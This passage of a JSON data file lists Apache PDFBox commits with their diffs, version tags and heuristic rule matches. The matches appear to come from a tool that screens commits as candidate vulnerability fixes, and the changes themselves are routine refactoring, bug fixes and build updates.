"-", + " public PDResources getResources()", + "@@ -1485,7 +1465,3 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "- if (outputStream != null)", + "- {", + "- outputStream.close();", + "- outputStream = null;", + "- }", + "+ outputStream.close();", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index d9032a819..82e4aca6c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -59,2 +59,3 @@ import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+import org.apache.pdfbox.util.Charsets;", + " import org.apache.pdfbox.util.Matrix;", + "@@ -151,6 +152,11 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- super();", + "+ this(document, sourcePage, appendContent, compress, resetContext, new PDStream(document));", + "+ }", + "+", + "+ private PDPageContentStream(PDDocument document, PDPage sourcePage, AppendMode appendContent,", + "+ boolean compress, boolean resetContext, PDStream stream) throws IOException", + "+ {", + "+ super(stream.createOutputStream(compress ? COSName.FLATE_DECODE : null));", + " this.document = document;", + "- COSName filter = compress ? COSName.FLATE_DECODE : null;", + "- ", + "+", + " // If request specifies the need to append/prepend to the document", + "@@ -158,5 +164,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- // Create a stream to append new content", + "- PDStream contentsToAppend = new PDStream(document);", + "- ", + " // Add new stream to contents array", + "@@ -175,5 +178,6 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " }", + "+", + " if (appendContent.isPrepend())", + " {", + "- array.add(0, contentsToAppend.getCOSObject());", + "+ array.add(0, stream.getCOSObject());", + " }", + "@@ -181,3 +185,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- array.add(contentsToAppend);", + "+ array.add(stream);", + " }", + "@@ -187,12 +191,13 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- // create a new stream to encapsulate the existing stream", + "- PDStream saveGraphics = new PDStream(document);", + "- setOutputStream(saveGraphics.createOutputStream(filter));", + "- ", + "- // save the initial/unmodified graphics context", + "- saveGraphicsState();", + "- close();", + "- ", + "+ // create a new stream to prefix existing stream", + "+ PDStream prefixStream = new PDStream(document);", + "+", + "+ // save the pre-append graphics state", + "+ OutputStream prefixOut = prefixStream.createOutputStream();", + "+ prefixOut.write(\"q\".getBytes(Charsets.US_ASCII));", + "+ prefixOut.write('\\n');", + "+ prefixOut.close();", + "+", + " // insert the new stream at the beginning", + "- array.add(0, saveGraphics.getCOSObject());", + "+ array.add(0, prefixStream.getCOSObject());", + " }", + "@@ -201,5 +206,4 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " sourcePage.getCOSObject().setItem(COSName.CONTENTS, array);", + "- setOutputStream(contentsToAppend.createOutputStream(filter));", + "- // restore the initial/unmodified graphics context", + "+ // restore the pre-append graphics state", + " if (resetContext)", + "@@ -215,7 +219,5 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " }", + "- PDStream contents = new PDStream(document);", + "- sourcePage.setContents(contents);", + "- setOutputStream(contents.createOutputStream(filter));", + "+ sourcePage.setContents(stream);", + " }", + "- ", + "+", + " // this has to be done here, as the resources will be set to null when resetting the content", + "@@ -229,2 +231,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " setResources(resources);", + "+", + " // configure NumberFormat", + "@@ -370,3 +373,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- COSWriter.writeString(encodedText, getOutputStream());", + "+ COSWriter.writeString(encodedText, outputStream);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "0663506b3042af7f40019f350b97b211a7d41804", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530181710, + "hunks": 1, + "message": "PDFBOX-4254: return initialException as final return path git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834593 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java b/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", + "index fc7ff6482..f11f219f3 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java", + "@@ -152,3 +152,3 @@ public final class IOUtils", + " }", + "- return null;", + "+ return initialException;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/io/IOUtils.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4254": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "627d9dc783cb3a117ab1b052eddf33129d29e1b6" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4254", + "relevance": 2 + } + ] + }, + { + "commit_id": "c24110a4e11eef8a3f1e0c7092431faab2344ae3", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523281094, + "hunks": 3, + "message": "PDFBOX-4184: divide 16 bit alpha values by 256 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828715 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 92f30feda..475437112 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -19,2 +19,3 @@ import java.awt.Transparency;", + " import java.awt.image.BufferedImage;", + "+import java.awt.image.DataBuffer;", + " import java.awt.image.WritableRaster;", + "@@ -186,5 +187,8 @@ public final class LosslessFactory", + " bpc = 8;", + "+ int dataType = alphaRaster.getDataBuffer().getDataType();", + "+ // for 16 it images we need to ", + "+ int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;", + " for (int pixel : pixels)", + " {", + "- bos.write(pixel);", + "+ bos.write(pixel >>> shift);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "8804e0042cbd029a22ca8fd00d73ad740f125a21" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "b38e7c56d9aa045f87eb3fe75f8900990993f231", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1533234468, + "hunks": 1, + "message": "PDFBOX-4071: update owasp plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1837331 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 9541dd891..107814dfb 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -146,3 +146,3 @@", + " dependency-check-maven", + "- 3.2.1", + "+ 3.3.0", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "e4694aa08ac836171e3bc2b56e81d65863a3d2b9" + ], + [ + "no-tag", + "a492fe5f9b6bf8f7f7b327e7f5080dec5eed9f53" + ], + [ + "no-tag", + "594506cb92e03767e4941473a88fc72c617340d5" + ], + [ + "no-tag", + "fc68ed0c5974540d104f27a4aff0183e8c821b67" + ], + [ + "no-tag", + "6429c1ff0571e2c3bb4c54b314999cd0c8fa4ecf" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "b6257c465930e845684d5dc67e9ecaed15fb6f82", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527182982, + "hunks": 3, + "message": "PDFBOX-4095: Sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832191 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index 48b397c73..db1a0ac4a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -350,5 +350,5 @@ public abstract class BlendMode", + " delta = ((rs - rd) * 77 + (gs - gd) * 151 + (bs - bd) * 28 + 0x80) >> 8;", + "- r = (rd + delta);", + "- g = (gd + delta);", + "- b = (bd + delta);", + "+ r = rd + delta;", + "+ g = gd + delta;", + "+ b = bd + delta;", + "@@ -361,3 +361,3 @@ public abstract class BlendMode", + " max = Math.max(r, Math.max(g, b));", + "- scale = (max == y ? 0 : ((255 - y) << 16) / (max - y));", + "+ scale = max == y ? 0 : ((255 - y) << 16) / (max - y);", + " }", + "@@ -367,3 +367,3 @@ public abstract class BlendMode", + " min = Math.min(r, Math.min(g, b));", + "- scale = (y == min ? 0 : (y << 16) / (y - min));", + "+ scale = y == min ? 0 : (y << 16) / (y - min);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4095": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "64a4a44e6be1b3e7fc87f5928090cd4fc61989f5" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4095", + "relevance": 2 + } + ] + }, + { + "commit_id": "bc90a1c99c5527f4bf67c86a0552c31070f924d4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527273375, + "hunks": 6, + "message": "PDFBOX-4071: add test to protect initialization sequence; move constructor to top for Sonar; avoid COMPATIBLE returning blend mode that specification says \"shouldn't be used\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832264 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index db1a0ac4a..338ff8fcf 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -62,3 +62,3 @@ public abstract class BlendMode", + " }", + "- return BlendMode.COMPATIBLE;", + "+ return BlendMode.NORMAL;", + " }", + "@@ -253,2 +253,6 @@ public abstract class BlendMode", + "+ BlendMode()", + "+ {", + "+ }", + "+", + " private static int get255Value(float val)", + "@@ -378,3 +382,3 @@ public abstract class BlendMode", + "- // these maps *must* come after the declarations above, otherwise its values will be null", + "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", + " private static final Map BLEND_MODES = createBlendModeMap();", + "@@ -386,3 +390,4 @@ public abstract class BlendMode", + " map.put(COSName.NORMAL, BlendMode.NORMAL);", + "- map.put(COSName.COMPATIBLE, BlendMode.COMPATIBLE);", + "+ // BlendMode.COMPATIBLE should not be used", + "+ map.put(COSName.COMPATIBLE, BlendMode.NORMAL);", + " map.put(COSName.MULTIPLY, BlendMode.MULTIPLY);", + "@@ -409,3 +414,4 @@ public abstract class BlendMode", + " map.put(BlendMode.NORMAL, COSName.NORMAL);", + "- map.put(BlendMode.COMPATIBLE, COSName.COMPATIBLE);", + "+ // BlendMode.COMPATIBLE should not be used", + "+ map.put(BlendMode.COMPATIBLE, COSName.NORMAL);", + " map.put(BlendMode.MULTIPLY, COSName.MULTIPLY);", + "@@ -427,6 +433,2 @@ public abstract class BlendMode", + " }", + "-", + "- BlendMode()", + "- {", + "- }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "7d5534b4ba75a1c4c610f6adb637d00e780daa08" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "29492ed1d27e4b31d30fc71b6deaa84cf1813c5f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527095770, + "hunks": 3, + "message": "PDFBOX-4228: fix ClassCastException and bug that prevented the use of a name for encoding in type3 fonts, by Daniel Persson git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832111 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "index bd043e68a..752e2e19f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "@@ -21,2 +21,4 @@ import java.io.IOException;", + " import java.io.InputStream;", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + " import org.apache.fontbox.FontBoxFont;", + "@@ -43,2 +45,7 @@ public class PDType3Font extends PDSimpleFont", + " {", + "+ /**", + "+ * Log instance.", + "+ */", + "+ private static final Log LOG = LogFactory.getLog(PDType3Font.class);", + "+", + " private PDResources resources;", + "@@ -68,4 +75,16 @@ public class PDType3Font extends PDSimpleFont", + " {", + "- COSDictionary encodingDict = (COSDictionary)dict.getDictionaryObject(COSName.ENCODING);", + "- encoding = new DictionaryEncoding(encodingDict);", + "+ COSBase encodingBase = dict.getDictionaryObject(COSName.ENCODING);", + "+ if (encodingBase instanceof COSName)", + "+ {", + "+ COSName encodingName = (COSName) encodingBase;", + "+ encoding = Encoding.getInstance(encodingName);", + "+ if (encoding == null)", + "+ {", + "+ LOG.warn(\"Unknown encoding: \" + encodingName.getName());", + "+ }", + "+ }", + "+ else if (encodingBase instanceof COSDictionary)", + "+ {", + "+ encoding = new DictionaryEncoding((COSDictionary) encodingBase);", + "+ }", + " glyphList = GlyphList.getAdobeGlyphList();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4228": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "113313a81a82377a8a07a2c55ce0ba6ce3ed20a5" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4228", + "relevance": 2 + } + ] + }, + { + "commit_id": "a8d0e0cbfcb7fffaca48e0568a3bafabb3f7f76a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530368232, + "hunks": 1, + "message": "PDFBOX-4184, PDFBOX-4071: exclude idea, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834738 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/.gitignore b/.gitignore", + "index 748b8ba93..1bb6e9aa6 100644", + "--- a/.gitignore", + "+++ b/.gitignore", + "@@ -5 +5,2 @@ bin/", + " .project", + "+.idea/" + ], + "changed_files": [ + ".gitignore" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "", + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "28fc7175c436a1d3b3a18a26a363fa62a0e217c2" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184, PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "50d1e2e8adf131119a5bceb418d460496bf62681", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524072720, + "hunks": 2, + "message": "PDFBOX-4197: consider object references git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829462 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", + "index 1584f42aa..abe1e8a61 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java", + "@@ -176,2 +176,6 @@ public class PDStructureElement extends PDStructureNode", + " COSBase item = it.next();", + "+ if (item instanceof COSObject)", + "+ {", + "+ item = ((COSObject) item).getObject();", + "+ }", + " if (item instanceof COSDictionary)", + "@@ -346,2 +350,6 @@ public class PDStructureElement extends PDStructureNode", + " COSBase item = it.next();", + "+ if (item instanceof COSObject)", + "+ {", + "+ item = ((COSObject) item).getObject();", + "+ }", + " if (item instanceof COSName)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/documentinterchange/logicalstructure/PDStructureElement.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4197": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "aec7d1e3b765ea9763803d9229c02ae6f082c188" + ], + [ + "no-tag", + "716ecbe82f1113cc50d76733e5b2045aeda959ef" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4197", + "relevance": 2 + } + ] + }, + { + "commit_id": "829c81b296ab9d4df8604e18ad8b9ade26fbab1b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531936045, + "hunks": 4, + "message": "PDFBOX-4013: sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836209 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "index 4f5af00c3..b2e4c3d22 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", + "@@ -134,8 +134,7 @@ public class OSXAdapter implements InvocationHandler", + " {", + "- if (!method.getName().equals(\"handleQuitRequestWith\"))", + "+ if (\"handleQuitRequestWith\".equals(method.getName()))", + " {", + "- return null;", + "+ // We just call our own quit handler", + "+ quitHandler.invoke(target);", + " }", + "- // We just call our own quit handler", + "- quitHandler.invoke(target);", + " return null;", + "@@ -245,2 +244,3 @@ public class OSXAdapter implements InvocationHandler", + " // file to be opened", + "+ @Override", + " public boolean callTarget(Object appleEvent) {" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4013": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "c713d75fe62eb3f25b59b9fd84779d6b19de8dab" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4013", + "relevance": 2 + } + ] + }, + { + "commit_id": "e8f631de7e74afb76848f914d14a796e276c3a17", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531583773, + "hunks": 1, + "message": "PDFBOX-4071: avoid \"unchecked\" warnings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835916 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "index 57beb6b3f..464668a6d 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", + "@@ -232,2 +232,3 @@ public class CertInformationCollector", + "+ @SuppressWarnings(\"unchecked\")", + " Collection matches = certificatesStore" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "207e0f308824c676e792f10c77fbf5b26b880d63" + ], + [ + "no-tag", + "dad63a8e49babcfa3075f4050a17097d44c75830" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "ece4c5f0da288c6f82125191fcd4e023679cc71f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532326549, + "hunks": 1, + "message": "PDFBOX-4071: replace broken link with archive git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836463 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index f62a84d9e..fcbebd90d 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -136,3 +136,3 @@", + " ${skip-bavaria}", + "- http://www.pdflib.com/fileadmin/pdflib/Bavaria/2009-04-03-Bavaria-pdfa.zip", + "+ https://web.archive.org/web/20160305185745if_/http://www.pdflib.com/fileadmin/pdflib/Bavaria/2009-04-03-Bavaria-pdfa.zip", + " true" + ], + "changed_files": [ + "preflight/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "6af0a0d1b3f126e21cc80347cc2b0eb7ec1b410c" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "1e6bf35df4b91fdd0eec5c32c3f05ab92d27a4c9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524671488, + "hunks": 1, + "message": "PDFBOX-4071: correct javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830092 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", + "index 7f5c40ea7..7cdbc6d53 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java", + "@@ -108,3 +108,3 @@ public class PDBorderEffectDictionary implements COSObjectable", + " *", + "- * @return the effect of the border", + "+ * @return the effect of the border or {@link #STYLE_SOLID} if none is found.", + " */" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDBorderEffectDictionary.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "ca68c6ac525451e647505e062feb65aab8121d7f" + ], + [ + "no-tag", + "b830a0536914b55325fa4c1bf7801625723d1d6c" + ], + [ + "no-tag", + "31094dda08aa280adf42f05c1da2bca068391d30" + ], + [ + "no-tag", + "5a89ad7859341b2a1d89b6f290871c6035a35f2d" + ], + [ + "no-tag", + "d5bbe5637dd0ba704065d6202854ce40667fe9be" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + 